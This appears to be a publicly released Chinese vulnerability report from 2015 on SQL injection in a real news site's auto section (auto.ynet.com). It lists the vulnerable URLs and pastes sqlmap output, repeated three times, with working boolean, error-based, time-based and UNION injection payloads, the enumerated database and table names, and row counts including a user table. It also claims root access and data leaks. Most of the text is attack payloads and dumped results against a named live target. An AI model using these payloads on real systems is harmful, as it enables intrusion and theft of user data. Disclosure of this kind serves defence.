2015-09-19: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-03: 厂商已经主动忽略漏洞,细节向公众公开
分站包括:新闻,时事,娱乐,体育,新闻专题,奥运,社会,法治,聚焦,评论,深度,网评,环球,论坛,图片,焦点,奇闻,真情等1.各种数据各种泄漏(不同分站不同数据)2.ROOT权限(可渗透可提权可危害多大你们懂的 同服655)3.世界排名:4,757 流量排名:6689 日均IP≈186,000 日均PV≈892,800(黑产们我是来终结你们的诡计的 -_-。sorry!)
注入点
http://auto.ynet.com/cgi/newslist.php?dir=101http://auto.ynet.com/cgi/news.php?id=532927http://auto.ynet.com/cgi/subbrand.php?subid=44http://auto.ynet.com/cgi/configuration.php?subid=44
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=532927 AND 8026=8026 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=532927 AND (SELECT 4037 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(4037=4037,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: id=532927 AND (SELECT * FROM (SELECT(SLEEP(10)))UmVb) Type: UNION query Title: MySQL UNION query (22) - 28 columns Payload: id=-8847 UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,CONCAT(0x7171787671,0x4665435848565a785572,0x7176767871),11,11,11,11,11,11,11,11,11,11,11#---web application technology: PHP 5.3.29back-end DBMS: MySQL 5.0available databases [3]:[*] foodbq[*] information_schema[*] web_2_1sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=532927 AND 8026=8026 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=532927 AND (SELECT 4037 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(4037=4037,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: id=532927 AND (SELECT * FROM (SELECT(SLEEP(10)))UmVb) Type: UNION query Title: MySQL UNION query (22) - 28 columns Payload: id=-8847 UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,CONCAT(0x7171787671,0x4665435848565a785572,0x7176767871),11,11,11,11,11,11,11,11,11,11,11#---web application technology: PHP 5.3.29back-end DBMS: MySQL 5.0current database: 'web_2_1'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=532927 AND 8026=8026 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=532927 AND (SELECT 4037 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(4037=4037,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: id=532927 AND (SELECT * FROM (SELECT(SLEEP(10)))UmVb) Type: UNION query Title: MySQL UNION query (22) - 28 columns Payload: id=-8847 UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,CONCAT(0x7171787671,0x4665435848565a785572,0x7176767871),11,11,11,11,11,11,11,11,11,11,11#---web application technology: PHP 5.3.29back-end DBMS: MySQL 5.0Database: web_2_1[40 tables]+-----------------+| global || user || article_from || auto_ad || auto_bang || auto_beauty || auto_big_brands || auto_bqyc || auto_brands || auto_cars || auto_comment || auto_index || auto_photo || auto_subbrands || auto_zhuanti || baojia_4s || beauty_album || beauty_index || blank_data || complain || dealers || fenlei || fenlei_beauty || friend_links || index_car2013 || market_cars || navcode || navigation || news || news_top || polymorphic || sp_t28 || sp_t32 || sp_t33 || sp_t34 || sp_t35 || sp_t36 || temp || tempdef || tuijian_top |+-----------------+Database: web_2_1+-----------------+---------+| Table | Entries |+-----------------+---------+| auto_cars | 13346 || news | 9507 || auto_photo | 6252 || auto_subbrands | 1522 || sp_t36 | 904 || tempdef | 711 || `user` | 446 || auto_beauty | 354 || auto_brands | 205 || auto_comment | 150 || auto_big_brands | 138 || beauty_album | 55 || baojia_4s | 37 || temp | 34 || fenlei | 33 || dealers | 28 || friend_links | 23 || complain | 20 || sp_t32 | 16 || market_cars | 14 || tuijian_top | 13 || auto_ad | 9 || auto_zhuanti | 9 || sp_t33 | 8 || news_top | 5 || sp_t28 | 5 || fenlei_beauty | 4 || navcode | 3 || `global` | 2 || article_from | 1 || auto_bang | 1 || auto_bqyc | 1 || auto_index | 1 || beauty_index | 1 || blank_data | 1 || index_car2013 | 1 || polymorphic | 1 || sp_t34 | 1 || sp_t35 | 1 |+-----------------+---------+
同上
- -
未能联系到厂商或者厂商积极拒绝
